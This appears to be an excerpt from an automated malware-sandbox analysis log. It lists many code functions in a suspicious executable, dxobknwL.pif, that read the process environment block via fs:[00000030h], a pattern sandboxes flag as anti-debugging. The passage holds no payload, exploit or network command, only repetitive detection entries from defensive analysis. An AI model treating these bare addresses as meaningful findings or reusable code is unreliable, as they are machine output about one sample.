Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A0E4978 mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A0529A0 mov eax, dword ptr fs:[00000030h] (13 hits)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A0409AD mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A0C89B3 mov esi, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A0C89B3 mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A10A9D3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A0D69C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A04A9D0 mov eax, dword ptr fs:[00000030h] (6 hits)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A0749D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A0CE9E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A0729F9 mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A06AE00 mov eax, dword ptr fs:[00000030h] (9 hits)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A06AE00 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A038E1D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A0D6E20 mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A0D6E20 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A112E4F mov eax, dword ptr fs:[00000030h] (2 hits)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A0C0E7F mov eax, dword ptr fs:[00000030h] (3 hits)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A046E71 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A03AE90 mov eax, dword ptr fs:[00000030h] (3 hits)
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A072E9C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A072E9C mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\Public\Libraries\dxobknwL.pif; Code function: 3_2_2A0CCEA0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0CCEA0 mov eax, dword ptr fs:[00000030h]3_2_2A0CCEA0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0CCEA0 mov eax, dword ptr fs:[00000030h]3_2_2A0CCEA0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0DAEB0 mov eax, dword ptr fs:[00000030h]3_2_2A0DAEB0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0DAEB0 mov eax, dword ptr fs:[00000030h]3_2_2A0DAEB0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F6ED0 mov ecx, dword ptr fs:[00000030h]3_2_2A0F6ED0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A046EE0 mov eax, dword ptr fs:[00000030h]3_2_2A046EE0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A046EE0 mov eax, dword ptr fs:[00000030h]3_2_2A046EE0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A046EE0 mov eax, dword ptr fs:[00000030h]3_2_2A046EE0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A046EE0 mov eax, dword ptr fs:[00000030h]3_2_2A046EE0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A078EF5 mov eax, dword ptr fs:[00000030h]3_2_2A078EF5
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F6F00 mov eax, dword ptr fs:[00000030h]3_2_2A0F6F00
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A042F12 mov eax, dword ptr fs:[00000030h]3_2_2A042F12
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A07CF1F mov eax, dword ptr fs:[00000030h]3_2_2A07CF1F
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A06EF28 mov eax, dword ptr fs:[00000030h]3_2_2A06EF28
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C4F40 mov eax, dword ptr fs:[00000030h]3_2_2A0C4F40
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C4F40 mov eax, dword ptr fs:[00000030h]3_2_2A0C4F40
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C4F40 mov eax, dword ptr fs:[00000030h]3_2_2A0C4F40
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C4F40 mov eax, dword ptr fs:[00000030h]3_2_2A0C4F40
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E4F42 mov eax, dword ptr fs:[00000030h]3_2_2A0E4F42
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03CF50 mov eax, dword ptr fs:[00000030h]3_2_2A03CF50
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03CF50 mov eax, dword ptr fs:[00000030h]3_2_2A03CF50
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03CF50 mov eax, dword ptr fs:[00000030h]3_2_2A03CF50
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03CF50 mov eax, dword ptr fs:[00000030h]3_2_2A03CF50
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03CF50 mov eax, dword ptr fs:[00000030h]3_2_2A03CF50
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03CF50 mov eax, dword ptr fs:[00000030h]3_2_2A03CF50
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A07CF50 mov eax, dword ptr fs:[00000030h]3_2_2A07CF50
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E0F50 mov eax, dword ptr fs:[00000030h]3_2_2A0E0F50
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E2F60 mov eax, dword ptr fs:[00000030h]3_2_2A0E2F60
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E2F60 mov eax, dword ptr fs:[00000030h]3_2_2A0E2F60
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A06AF69 mov eax, dword ptr fs:[00000030h]3_2_2A06AF69
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A06AF69 mov eax, dword ptr fs:[00000030h]3_2_2A06AF69
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A114F68 mov eax, dword ptr fs:[00000030h]3_2_2A114F68
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A07CF80 mov eax, dword ptr fs:[00000030h]3_2_2A07CF80
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A072F98 mov eax, dword ptr fs:[00000030h]3_2_2A072F98
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A072F98 mov eax, dword ptr fs:[00000030h]3_2_2A072F98
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A042FC8 mov eax, dword ptr fs:[00000030h]3_2_2A042FC8
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A042FC8 mov eax, dword ptr fs:[00000030h]3_2_2A042FC8
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A042FC8 mov eax, dword ptr fs:[00000030h]3_2_2A042FC8
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A042FC8 mov eax, dword ptr fs:[00000030h]3_2_2A042FC8
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03EFD8 mov eax, dword ptr fs:[00000030h]3_2_2A03EFD8
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03EFD8 mov eax, dword ptr fs:[00000030h]3_2_2A03EFD8
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03EFD8 mov eax, dword ptr fs:[00000030h]3_2_2A03EFD8
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A114FE7 mov eax, dword ptr fs:[00000030h]3_2_2A114FE7
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F6FF7 mov eax, dword ptr fs:[00000030h]3_2_2A0F6FF7
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A080FF6 mov eax, dword ptr fs:[00000030h]3_2_2A080FF6
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A080FF6 mov eax, dword ptr fs:[00000030h]3_2_2A080FF6
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A080FF6 mov eax, dword ptr fs:[00000030h]3_2_2A080FF6
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A080FF6 mov eax, dword ptr fs:[00000030h]3_2_2A080FF6
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C4C0F mov eax, dword ptr fs:[00000030h]3_2_2A0C4C0F
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A050C00 mov eax, dword ptr fs:[00000030h]3_2_2A050C00
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A050C00 mov eax, dword ptr fs:[00000030h]3_2_2A050C00
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A050C00 mov eax, dword ptr fs:[00000030h]3_2_2A050C00
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A050C00 mov eax, dword ptr fs:[00000030h]3_2_2A050C00
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A07CC00 mov eax, dword ptr fs:[00000030h]3_2_2A07CC00
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03EC20 mov eax, dword ptr fs:[00000030h]3_2_2A03EC20
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0DCC20 mov eax, dword ptr fs:[00000030h]3_2_2A0DCC20
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0DCC20 mov eax, dword ptr fs:[00000030h]3_2_2A0DCC20
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E4C34 mov eax, dword ptr fs:[00000030h]3_2_2A0E4C34
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E4C34 mov eax, dword ptr fs:[00000030h]3_2_2A0E4C34
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E4C34 mov eax, dword ptr fs:[00000030h]3_2_2A0E4C34
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E4C34 mov eax, dword ptr fs:[00000030h]3_2_2A0E4C34
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E4C34 mov eax, dword ptr fs:[00000030h]3_2_2A0E4C34
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E4C34 mov eax, dword ptr fs:[00000030h]3_2_2A0E4C34
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E4C34 mov ecx, dword ptr fs:[00000030h]3_2_2A0E4C34
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04AC50 mov eax, dword ptr fs:[00000030h]3_2_2A04AC50
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04AC50 mov eax, dword ptr fs:[00000030h]3_2_2A04AC50
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04AC50 mov eax, dword ptr fs:[00000030h]3_2_2A04AC50
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04AC50 mov eax, dword ptr fs:[00000030h]3_2_2A04AC50
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04AC50 mov eax, dword ptr fs:[00000030h]3_2_2A04AC50
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04AC50 mov eax, dword ptr fs:[00000030h]3_2_2A04AC50
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A046C50 mov eax, dword ptr fs:[00000030h]3_2_2A046C50
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A046C50 mov eax, dword ptr fs:[00000030h]3_2_2A046C50
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A046C50 mov eax, dword ptr fs:[00000030h]3_2_2A046C50
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A074C59 mov eax, dword ptr fs:[00000030h]3_2_2A074C59
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A038C8D mov eax, dword ptr fs:[00000030h]3_2_2A038C8D
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0BCCA0 mov ecx, dword ptr fs:[00000030h]3_2_2A0BCCA0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0BCCA0 mov eax, dword ptr fs:[00000030h]3_2_2A0BCCA0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0BCCA0 mov eax, dword ptr fs:[00000030h]3_2_2A0BCCA0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0BCCA0 mov eax, dword ptr fs:[00000030h]3_2_2A0BCCA0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A068CB1 mov eax, dword ptr fs:[00000030h]3_2_2A068CB1
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A068CB1 mov eax, dword ptr fs:[00000030h]3_2_2A068CB1
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0CB5 mov eax, dword ptr fs:[00000030h]3_2_2A0F0CB5
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0CB5 mov eax, dword ptr fs:[00000030h]3_2_2A0F0CB5
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0CB5 mov eax, dword ptr fs:[00000030h]3_2_2A0F0CB5
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0CB5 mov eax, dword ptr fs:[00000030h]3_2_2A0F0CB5
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0CB5 mov eax, dword ptr fs:[00000030h]3_2_2A0F0CB5
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0CB5 mov eax, dword ptr fs:[00000030h]3_2_2A0F0CB5
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0CB5 mov eax, dword ptr fs:[00000030h]3_2_2A0F0CB5
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0CB5 mov eax, dword ptr fs:[00000030h]3_2_2A0F0CB5
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0CB5 mov eax, dword ptr fs:[00000030h]3_2_2A0F0CB5
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0CB5 mov eax, dword ptr fs:[00000030h]3_2_2A0F0CB5
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0CB5 mov eax, dword ptr fs:[00000030h]3_2_2A0F0CB5
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0CB5 mov eax, dword ptr fs:[00000030h]3_2_2A0F0CB5
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0CB5 mov eax, dword ptr fs:[00000030h]3_2_2A0F0CB5
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03CCC8 mov eax, dword ptr fs:[00000030h]3_2_2A03CCC8
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A038CD0 mov eax, dword ptr fs:[00000030h]3_2_2A038CD0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A072CF0 mov eax, dword ptr fs:[00000030h]3_2_2A072CF0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A072CF0 mov eax, dword ptr fs:[00000030h]3_2_2A072CF0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A072CF0 mov eax, dword ptr fs:[00000030h]3_2_2A072CF0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A072CF0 mov eax, dword ptr fs:[00000030h]3_2_2A072CF0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A05AD00 mov eax, dword ptr fs:[00000030h]3_2_2A05AD00
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A05AD00 mov eax, dword ptr fs:[00000030h]3_2_2A05AD00
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A05AD00 mov eax, dword ptr fs:[00000030h]3_2_2A05AD00
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A036D10 mov eax, dword ptr fs:[00000030h]3_2_2A036D10
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A036D10 mov eax, dword ptr fs:[00000030h]3_2_2A036D10
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A036D10 mov eax, dword ptr fs:[00000030h]3_2_2A036D10
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A074D1D mov eax, dword ptr fs:[00000030h]3_2_2A074D1D
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F8D10 mov eax, dword ptr fs:[00000030h]3_2_2A0F8D10
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F8D10 mov eax, dword ptr fs:[00000030h]3_2_2A0F8D10
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A114D30 mov eax, dword ptr fs:[00000030h]3_2_2A114D30
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C8D20 mov eax, dword ptr fs:[00000030h]3_2_2A0C8D20
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A040D59 mov eax, dword ptr fs:[00000030h]3_2_2A040D59
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A040D59 mov eax, dword ptr fs:[00000030h]3_2_2A040D59
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A040D59 mov eax, dword ptr fs:[00000030h]3_2_2A040D59
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A048D59 mov eax, dword ptr fs:[00000030h]3_2_2A048D59
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A048D59 mov eax, dword ptr fs:[00000030h]3_2_2A048D59
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A048D59 mov eax, dword ptr fs:[00000030h]3_2_2A048D59
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A048D59 mov eax, dword ptr fs:[00000030h]3_2_2A048D59
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A048D59 mov eax, dword ptr fs:[00000030h]3_2_2A048D59
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0D8D6B mov eax, dword ptr fs:[00000030h]3_2_2A0D8D6B
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A076DA0 mov eax, dword ptr fs:[00000030h]3_2_2A076DA0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A07CDB1 mov ecx, dword ptr fs:[00000030h]3_2_2A07CDB1
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A07CDB1 mov eax, dword ptr fs:[00000030h]3_2_2A07CDB1
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A07CDB1 mov eax, dword ptr fs:[00000030h]3_2_2A07CDB1
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A068DBF mov eax, dword ptr fs:[00000030h]3_2_2A068DBF
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A068DBF mov eax, dword ptr fs:[00000030h]3_2_2A068DBF
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A114DAD mov eax, dword ptr fs:[00000030h]3_2_2A114DAD
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A108DAE mov eax, dword ptr fs:[00000030h]3_2_2A108DAE
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A108DAE mov eax, dword ptr fs:[00000030h]3_2_2A108DAE
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A06EDD3 mov eax, dword ptr fs:[00000030h]3_2_2A06EDD3
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A06EDD3 mov eax, dword ptr fs:[00000030h]3_2_2A06EDD3
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C4DD7 mov eax, dword ptr fs:[00000030h]3_2_2A0C4DD7
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C4DD7 mov eax, dword ptr fs:[00000030h]3_2_2A0C4DD7
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04ADE0 mov eax, dword ptr fs:[00000030h]3_2_2A04ADE0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04ADE0 mov eax, dword ptr fs:[00000030h]3_2_2A04ADE0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04ADE0 mov eax, dword ptr fs:[00000030h]3_2_2A04ADE0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04ADE0 mov eax, dword ptr fs:[00000030h]3_2_2A04ADE0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04ADE0 mov eax, dword ptr fs:[00000030h]3_2_2A04ADE0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A04ADE0 mov eax, dword ptr fs:[00000030h]3_2_2A04ADE0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A060DE1 mov eax, dword ptr fs:[00000030h]3_2_2A060DE1
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03CDEA mov eax, dword ptr fs:[00000030h]3_2_2A03CDEA
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03CDEA mov eax, dword ptr fs:[00000030h]3_2_2A03CDEA
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A036DF6 mov eax, dword ptr fs:[00000030h]3_2_2A036DF6
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A06CDF0 mov eax, dword ptr fs:[00000030h]3_2_2A06CDF0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A06CDF0 mov ecx, dword ptr fs:[00000030h]3_2_2A06CDF0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E0DF0 mov eax, dword ptr fs:[00000030h]3_2_2A0E0DF0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0E0DF0 mov eax, dword ptr fs:[00000030h]3_2_2A0E0DF0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03823B mov eax, dword ptr fs:[00000030h]3_2_2A03823B
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A11625D mov eax, dword ptr fs:[00000030h]3_2_2A11625D
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C8243 mov eax, dword ptr fs:[00000030h]3_2_2A0C8243
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C8243 mov ecx, dword ptr fs:[00000030h]3_2_2A0C8243
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03A250 mov eax, dword ptr fs:[00000030h]3_2_2A03A250
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A046259 mov eax, dword ptr fs:[00000030h]3_2_2A046259
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0FA250 mov eax, dword ptr fs:[00000030h]3_2_2A0FA250
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0FA250 mov eax, dword ptr fs:[00000030h]3_2_2A0FA250
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A044260 mov eax, dword ptr fs:[00000030h]3_2_2A044260
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A044260 mov eax, dword ptr fs:[00000030h]3_2_2A044260
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A044260 mov eax, dword ptr fs:[00000030h]3_2_2A044260
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A03826B mov eax, dword ptr fs:[00000030h]3_2_2A03826B
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0274 mov eax, dword ptr fs:[00000030h]3_2_2A0F0274
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0274 mov eax, dword ptr fs:[00000030h]3_2_2A0F0274
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0274 mov eax, dword ptr fs:[00000030h]3_2_2A0F0274
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0274 mov eax, dword ptr fs:[00000030h]3_2_2A0F0274
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0274 mov eax, dword ptr fs:[00000030h]3_2_2A0F0274
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0274 mov eax, dword ptr fs:[00000030h]3_2_2A0F0274
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0274 mov eax, dword ptr fs:[00000030h]3_2_2A0F0274
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0274 mov eax, dword ptr fs:[00000030h]3_2_2A0F0274
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0274 mov eax, dword ptr fs:[00000030h]3_2_2A0F0274
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0274 mov eax, dword ptr fs:[00000030h]3_2_2A0F0274
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0274 mov eax, dword ptr fs:[00000030h]3_2_2A0F0274
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0F0274 mov eax, dword ptr fs:[00000030h]3_2_2A0F0274
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A07E284 mov eax, dword ptr fs:[00000030h]3_2_2A07E284
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A07E284 mov eax, dword ptr fs:[00000030h]3_2_2A07E284
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C0283 mov eax, dword ptr fs:[00000030h]3_2_2A0C0283
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C0283 mov eax, dword ptr fs:[00000030h]3_2_2A0C0283
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0C0283 mov eax, dword ptr fs:[00000030h]3_2_2A0C0283
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0502A0 mov eax, dword ptr fs:[00000030h]3_2_2A0502A0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0502A0 mov eax, dword ptr fs:[00000030h]3_2_2A0502A0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0D62A0 mov eax, dword ptr fs:[00000030h]3_2_2A0D62A0
                      Source: C:\Users\Public\Libraries\dxobknwL.pifCode function: 3_2_2A0D62A0 mov ecx, dword ptr fs:[00000030h]3_2_2A0D62A0
